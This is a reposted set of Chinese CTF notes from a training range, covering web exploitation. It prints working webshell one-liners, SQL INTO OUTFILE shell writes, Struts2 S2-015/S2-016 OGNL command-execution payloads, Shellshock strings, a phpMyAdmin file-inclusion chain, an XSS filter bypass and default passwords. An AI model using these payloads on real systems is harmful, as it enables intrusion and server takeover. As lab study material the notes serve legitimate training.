ctf笔记(墨者学院) 19.8.11-19.8.27

最新推荐文章于 2022-12-30 10:58:28 发布
最新推荐文章于 2022-12-30 10:58:28 发布
阅读量534 收藏
点赞数
文章标签: php shell 运维
原文链接:http://www.cnblogs.com/5h4d0w/p/11432731.html
版权

本期笔记以墨者学院的靶场为主

文件上传漏洞
当php上传失败后,可考虑是否对后缀名进行过滤(改后缀名为php5、php3)
iis6解析漏洞:当上传到目录为/*.asp时,任何文件皆解析为asp,可以上传asp形式的图马或txt马,连接(连接时直接连即可)

SQL注入
数字型注入:无单引号
字符型注入:前有单引号后有注释符,万能密码' or '1'='1 除外
盲注:
可用工具、程序、burp爆破来辅助
正则注入
1 and 1=(select 1 from information_schema.tables where table_schema='xxx' and table_name regexp '^us[a-z]' limit 0,1)
注意:正则匹配所有项,与常规盲注的limit n,1不同,正则是不需要改的
同样,用like类似正则
select user() like 'ro%'

弱口令
admin admin/admin admin888/admin 123456/admin 域名/test test/test test123

文件解析漏洞
目录解析
/xx.asp/webshell.jpg
/xx.asa/webshell.jpg
文件解析
webshell.asp;jpg 适用于iis6
Apache解析漏洞
test.php.xxx.yyy x和y皆为无法识别的后缀名
copy xx.jpg /b + yy.txt /a xy.jpg 图马->构造sp.jpg,写入<?PHP fputs(fopen('payload.php','w'),' <?php eval($_POST[hehe])?>');?>,访问sp.jpg/.php 适用于Fast-CGI开启 0x02 IIS 7.0/IIS 7.5/ Nginx版本<=8.03
/xx.jpg%00.php 在Fast-CGI关闭的情况下,Nginx <=0.8.37
罕见后缀
php族 phtml、pht、php3、php4、php5、pyc和pyo
.htaccess利用
.htaccess文件如果可以上传且能覆盖原有配置,文件写入配置<FilesMatch "1"> SetHandler application/x-httpd-php </FilesMatch>
生效条件:Apache的配置文件中写上:AllowOverride All
加载mod_Rewrite模块,在Apache的配置文件中写上:LoadModule rewrite_module /usr/lib/apache2/modules/mod_rewrite.so
(Ubuntu中还需要) sudo a2enmod rewrite
利用
MIME类型修改:.htaccess中写: AddType application/x-httpd-php
或写<FilesMatch "shell.jpg">SetHandler application/x-httpd-php</FilesMatch>,可使shell.jpg解析为php
或写<FilesMatch "hello"> SetHandler application/x-httpd-php </FilesMatch>,只要包含hello就会被解析为php

sql写shell
1' union select 1,'<?php eval($_POST[a]);?>' into outfile '/var/www/tmp/a.php'# 用into outfile将一句话木马写成php,前提:知道网站绝对路径 一句话木马部分转hex
绝对路径 可以在写into outfile时虚构一个路径来爆出真的路径
bypass 空格绕过 比如屏蔽union 可改写为un union ion

struct2 s2-16漏洞
找action,然后构造以下代码(以index.action,redirect命令为例,代码作用为执行攻击命令并下载文件到本地)
index.action?redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'ls','\'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}
new java.lang.String[]{'ls','\'}为攻击命令
对于 index.action?redirect: 后面的内容,有可能需要进行url转码
下列代码可用于回显网站绝对路径
index.action?redirect:${#a=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),#b=#a.getSession(),#c=#b.getServletContext(),#d=#c.getRealPath("/"),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#d),#matt.getWriter().flush(),#matt.getWriter().close()}
以上代码均为ONGL表达式

bash 远程执行命令漏洞
找/cgi-bin/x.cgi 或直接找到cgi 用搜索引擎
利用漏洞() { :;}; + 命令执行 (用burp抓包,将此语句放入connection或user-agent)
命令示例:
() { :;}; echo; /bin/bash -c 'cat /key.txt'
() { :;}; echo; /bin/ls /
echo;是为了闭合函数

svn源码泄漏漏洞
/.svn/entries 显示网站目录数
/.svn/wc.db 可下载数据库,用数据库软件如SQLiteStudio打开(或者改名为txt尝试用notpad++打开),然后寻找key

bypass 0day
<svg><script xlink:href=data:,alert(1)></script></svg> 利用svg标签进行绕过

php后台文件包含漏洞 CVE-2018-12613
前提:登录后台
打开SQL,写select '<?php phpinfo()?>;'
burp抓包,记录下cookie(phpMyAdmin=xxx)
利用文件包含漏洞
index.php?target=db_sql.php%253f/../../../../../../../../../../../tmp/sess_+之前记录的cookie
(Macos的session保存目录为/var/tmp/,Linux的session保存目录为/var/lib/php/sessions)
在phpinfo中寻找path,找网站的绝对路径
例:/var/www/html/
则通过sql into outfile的方式写马:
select '<?php @eval($_POST[a])?>;' into outfile '/var/www/html/a.php'

HTTP头注入(X-Forwarded-for)
抓包,发送至repeater,写入X-Forwarded-For:or 1=1
如果报错则存在注入
然后进行常规的sql注入(order by...union select...)

struct2 s2-04漏洞
利用方式:/struts/../ 对目录进行回溯
bypass:url编码 ..%2f,若无法正常回显则尝试二次url编码 ..%252f

struct2 s2-15漏洞
检验:/${1+1}.action,被执行则存在漏洞
exp:${#context['xwork.MethodAccessor.denyMethodExecution']=false,#m=#_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),#m.setAccessible(true),#m.set(#_memberAccess,true),#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('ls').getInputStream()),#q}.action
bypass:url编码

参数提交:
/?+参数 可向网站提交参数,提交方式可用burp进行修改

文件读取
例:index.php?jpg=hei.jpg,改写为index.php?jpg=index.php可读取index.php的内容

Created by PhpStorm
phpStorm会自动生成.idea文件,其中会包含一组xml文件

转载于:https://www.cnblogs.com/5h4d0w/p/11432731.html

dingpang8200
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
墨者学院CTF(SQL注入漏洞测试(参数加密))
痴人说梦梦中人
08-10 5529
靶场地址:https://www.mozhe.cn/bug/detail/SjRRVFpOQWlLWDBJd3hzNGY5cFBiQT09bW96aGUmozhe 1. 靶场截图: 2. 目录扫描 访问可得new目录下list.php源码,即在此处存在注入漏洞 3. 代码审计 <?php header('content-type:text/html;charset=utf-8'); //发起...
ctf笔记 19.8.11-19.8.27
canhao1322的博客
08-27 578
本人以后将在博客园发布文章:https://www.cnblogs.com/5h4d0w/文件上传漏洞当php上传失败后,可考虑文件白名单(改后缀名为php5、php3)iis6解析漏洞:当上传到目录为/*.asp时,任何文件皆解析为asp,可以上传asp形式的图马或txt马,连接(连接时直接连即可) SQL注入数字型注入:无单引号字符型注入:前有单引号后有注释符,万能密码' or '1'='1 ...
CTF墨者靶场sql注入参数加密
qq_36585338的博客
11-26 1168
关于sql注入的扩展案例参数加密注入,本文章讲述了参数的加密类型,以及加密代码的审计,拖库等知识
【web-ctfctf-pikachu-sql
一个努力生活的人的博客
07-11 1107
pikachu-sql
墨者靶场 WordPress插件漏洞分析溯源
永远是少年
12-30 1459
今天继续给大家介绍CTF刷题,本文主要内容墨者靶场 WordPress插件漏洞分析溯源。 一、题目简介 二、解题实战
CTFtime.org-CTF-events:CTFtime.org-CTF-events KR
04-12
CTFtime.org-CTF-事件CTFtime.org-CTF-events KR
CTF资料.rar-------
02-16
ctf入门
CTF-100题.-天天练习-学习
11-01
CTF-100题.-----------------天天练习------------------学习 100小题,试例练习
CTF Wiki 2017.12.27
01-20
CTF Wiki 2017.12.27 CTF Wiki 2017.12.27 CTF Wiki 2017.12.27
轩禹CTF_RSA工具3.6.1.zip
最新发布
01-29
CTF常用工具集
ctf---pzctf赛前测试题
weixin_40709439的博客
11-22 1390
title:pzctf赛前测试题 0x01 phpmyadmin后台文件包含 phpmyadmin是一款应用非常广泛的mysql数据库管理软件,基于PHP开发。 CVE-2018-12613 PhpMyadmin后台文件包含分析,影响版本如下: phpMyAdmin 4.8.0和4.8.1受到影响。 第一题:点进去是一个phpmyadmin登陆后台(普通权限) 第一时间想到是into oufil...
Struts2远程命令执行漏洞
热门推荐
mirror97black的博客
12-20 1万+
Struts2 远程命令执行漏洞
java struts2 漏洞_Struts2漏洞利用
weixin_34837898的博客
02-13 718
Struts漏洞合集Struts-S2-013漏洞利用受影响版本Struts 2.0.0 - Struts 2.3.14.1漏洞利用任意命令执行POC:${(#_memberAccess["allowStaticMethodAccess"]=true,#a=@java.lang.Runtime@getRuntime().exec('id').getInputStream(),#b=new java...
Struts2-046漏洞复现
帅醉了的博客
11-02 1232
漏洞存在位置: 1、Content-Length:的长度大于2g 2、filename=这个参数 poc为 "%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Test','Kaboom')}" 利用: exp: sh exploit-cd.sh http://192.168.202.133:8080/ ifconfig ...
【Less-7】into outfile写入webshell
ssrf
10-28 621
目录一、测试注入点二、判断字段数三、into outfile写入webshell 一、测试注入点 源码: $sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1"; $result=mysql_query($sql); $row = mysql_fetch_array($result); if($row) { echo '<font color= "#FFFF00">'; echo 'You are in.... Us
S2-045 远程代码执行漏洞(CVE-2017-5638)
Stephen Wolf
11-04 8458
一、S2-045 远程代码执行漏洞(CVE-2017-5638) 简述: Apache官方发布Struts 2 紧急漏洞公告(S2-045),CVE编号CVE-2017-5638。公告中披露 ,当基于Jakarta插件上传文件时,可导致远程代码执行。例如在系统中获得管理员权限,执行添加用户。可任意查看、修改或删除文件。造成机密数据泄露,重要信息遭到篡改等重大...
Struts2安全漏洞
solobear的专栏
07-27 4058
摘要:Struts应用开发框架目前广泛应用于大型互联网企业、政府、金融机构等网站建设,并作为网站开发的底层模板使用。近日网上公布了Struts一个严重的命令执行漏洞,在我国互联网环境影响巨大,本文将对这个漏洞进行分析和描述。 Struts是Apache软件基金会Jakarta项目组的一个开源项目,它采用MVC模式,帮助java开发者利用J2EE开发Web应用。目前,Struts广泛应用于大型
CTF-Vigenere
bronze_s的博客
04-06 4545
题目内容: 二战的鹰酱截获了敌军发送的密报,但是关于如何破解却无从下手。经过密码学专家分析,这是“不可破译的密码”。但那已经是上个世纪的事了,现在,我相信你肯定有办法。flag提交前添加flag{} cvnwvk lqae bw wzgy czxrxlm gnaoiiaafy. am ara xaufwiu qf fwg mlfckmnv tru aajtwxr pmsd afw rfe zms ehvv bzmn lpiebq yeeuiia. zq hsl qrvq keskw fn jqswtv
wss://ctf.xidian.edu.cn/api/traffic/Ss5MR7DUQJwSxpV-GBGNF
08-16
你可以在Vue项目的config.vue文件中添加以下配置信息来解决这个问题: ``` devServer: { host: '0.0.0.0', // https: true, port: 6103, client: { webSocketURL: 'wss://ctf.xidian.edu.cn/api/traffic/Ss5MR7DUQJwSxpV-GBGNF/ws', }, headers: { 'Access-Control-Allow-Origin': '*', }, }, ``` 另外,在vue.config.js文件中也可以添加相似的配置代码: ``` devServer: { host: '0.0.0.0', port: 3000, client: { webSocketURL: 'wss://ctf.xidian.edu.cn/api/traffic/Ss5MR7DUQJwSxpV-GBGNF/ws', }, headers: { 'Access-Control-Allow-Origin': '*', }, }, ``` 这样做可以确保你的Vue项目能够成功连接到wss://ctf.xidian.edu.cn/api/traffic/Ss5MR7DUQJwSxpV-GBGNF。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [vue项目使用websocket时报错: connection to ‘ws://...‘failed: Error in connection establish](https://blog.csdn.net/weixin_65793170/article/details/128127889)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [WebSocket connection to ‘ws://xxx.xxx.x.xxxx:8080/ws‘failed:问题](https://blog.csdn.net/z914020826/article/details/127232233)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [控制台反复输出WebSocket connection to ‘ws://10.133.212.203:8080/ws‘ failed:](https://blog.csdn.net/weixin_46466212/article/details/126762870)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值